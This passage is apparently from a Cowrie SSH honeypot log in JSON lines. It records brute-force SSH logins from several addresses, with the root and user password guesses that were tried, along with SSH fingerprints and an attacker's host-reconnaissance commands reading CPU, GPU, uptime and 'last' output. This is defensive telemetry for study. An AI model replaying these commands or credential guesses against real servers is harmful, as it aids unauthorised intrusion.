(grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.611223Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.611907Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.612926Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.614320Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.614999Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.615766Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.616794Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.617382Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.618022Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.618652Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.619244Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:50:40.619801Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":41752,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf0ea4d482d0","protocol":"ssh","message":"New connection: 185.93.89.7:41752 (1.2.3.4:22) [session: bf0ea4d482d0]","sensor":"my-vps","timestamp":"2025-08-28T08:50:42.007005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:50:42.008389Z","src_ip":"185.93.89.7","session":"bf0ea4d482d0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:50:42.026609Z","src_ip":"185.93.89.7","session":"bf0ea4d482d0"}
{"eventid":"cowrie.login.success","username":"root","password":"index2023!","message":"login attempt [root/index2023!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:50:42.067065Z","src_ip":"185.93.89.7","session":"bf0ea4d482d0"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:42.085992Z","src_ip":"185.93.89.7","session":"bf0ea4d482d0"}
{"eventid":"cowrie.session.connect","src_ip":"77.90.185.47","src_port":33502,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fcf3a820788","protocol":"ssh","message":"New connection: 77.90.185.47:33502 (1.2.3.4:22) [session: 0fcf3a820788]","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.233189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.234114Z","src_ip":"77.90.185.47","session":"0fcf3a820788"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.249918Z","src_ip":"77.90.185.47","session":"0fcf3a820788"}
{"eventid":"cowrie.login.success","username":"root","password":"pfsense","message":"login attempt [root/pfsense] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.282054Z","src_ip":"77.90.185.47","session":"0fcf3a820788"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":39936,"dst_ip":"1.2.3.4","dst_port":22,"session":"8990afe8d127","protocol":"ssh","message":"New connection: 51.79.164.132:39936 (1.2.3.4:22) [session: 8990afe8d127]","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.298857Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.300660Z","src_ip":"77.90.185.47","session":"0fcf3a820788"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.446434Z","src_ip":"51.79.164.132","session":"8990afe8d127"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.746866Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"6.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.747711Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.session.closed","duration":"21.9","message":"Connection lost after 21.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.748561Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:50:46.968729Z","src_ip":"51.79.164.132","session":"8990afe8d127"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:50:48.376603Z","src_ip":"51.79.164.132","session":"8990afe8d127"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:49.964445Z","src_ip":"51.79.164.132","session":"8990afe8d127"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43636,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5286e440147","protocol":"ssh","message":"New connection: 185.93.89.7:43636 (1.2.3.4:22) [session: e5286e440147]","sensor":"my-vps","timestamp":"2025-08-28T08:50:51.480609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:50:51.504474Z","src_ip":"185.93.89.7","session":"e5286e440147"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:50:51.505273Z","src_ip":"185.93.89.7","session":"e5286e440147"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2023!","message":"login attempt [root/Index2023!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:50:51.584082Z","src_ip":"185.93.89.7","session":"e5286e440147"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:51.605976Z","src_ip":"185.93.89.7","session":"e5286e440147"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":36028,"dst_ip":"1.2.3.4","dst_port":22,"session":"53dba3232496","protocol":"ssh","message":"New connection: 51.79.164.132:36028 (1.2.3.4:22) [session: 53dba3232496]","sensor":"my-vps","timestamp":"2025-08-28T08:51:13.134491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:51:13.235765Z","src_ip":"51.79.164.132","session":"53dba3232496"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:51:13.701429Z","src_ip":"51.79.164.132","session":"53dba3232496"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-28T08:51:15.386379Z","src_ip":"51.79.164.132","session":"53dba3232496"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:51:16.965612Z","src_ip":"51.79.164.132","session":"53dba3232496"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37260,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4138cb99f5b","protocol":"ssh","message":"New connection: 185.93.89.7:37260 (1.2.3.4:22) [session: d4138cb99f5b]","sensor":"my-vps","timestamp":"2025-08-28T08:51:27.295868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:51:27.297287Z","src_ip":"185.93.89.7","session":"d4138cb99f5b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:51:27.315005Z","src_ip":"185.93.89.7","session":"d4138cb99f5b"}
{"eventid":"cowrie.login.success","username":"root","password":"index2023@","message":"login attempt [root/index2023@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:51:27.352094Z","src_ip":"185.93.89.7","session":"d4138cb99f5b"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:51:27.371111Z","src_ip":"185.93.89.7","session":"d4138cb99f5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21018,"dst_ip":"1.2.3.4","dst_port":22,"session":"5954ded125b5","protocol":"ssh","message":"New connection: 212.227.125.160:21018 (1.2.3.4:22) [session: 5954ded125b5]","sensor":"my-vps","timestamp":"2025-08-28T08:51:27.454619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:51:27.455544Z","src_ip":"212.227.125.160","session":"5954ded125b5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:51:27.535675Z","src_ip":"212.227.125.160","session":"5954ded125b5"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T08:51:27.943550Z","src_ip":"212.227.125.160","session":"5954ded125b5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:51:29.025847Z","src_ip":"212.227.125.160","session":"5954ded125b5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35482,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb64f2bd801e","protocol":"ssh","message":"New connection: 185.93.89.7:35482 (1.2.3.4:22) [session: bb64f2bd801e]","sensor":"my-vps","timestamp":"2025-08-28T08:51:36.445759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:51:36.448787Z","src_ip":"185.93.89.7","session":"bb64f2bd801e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp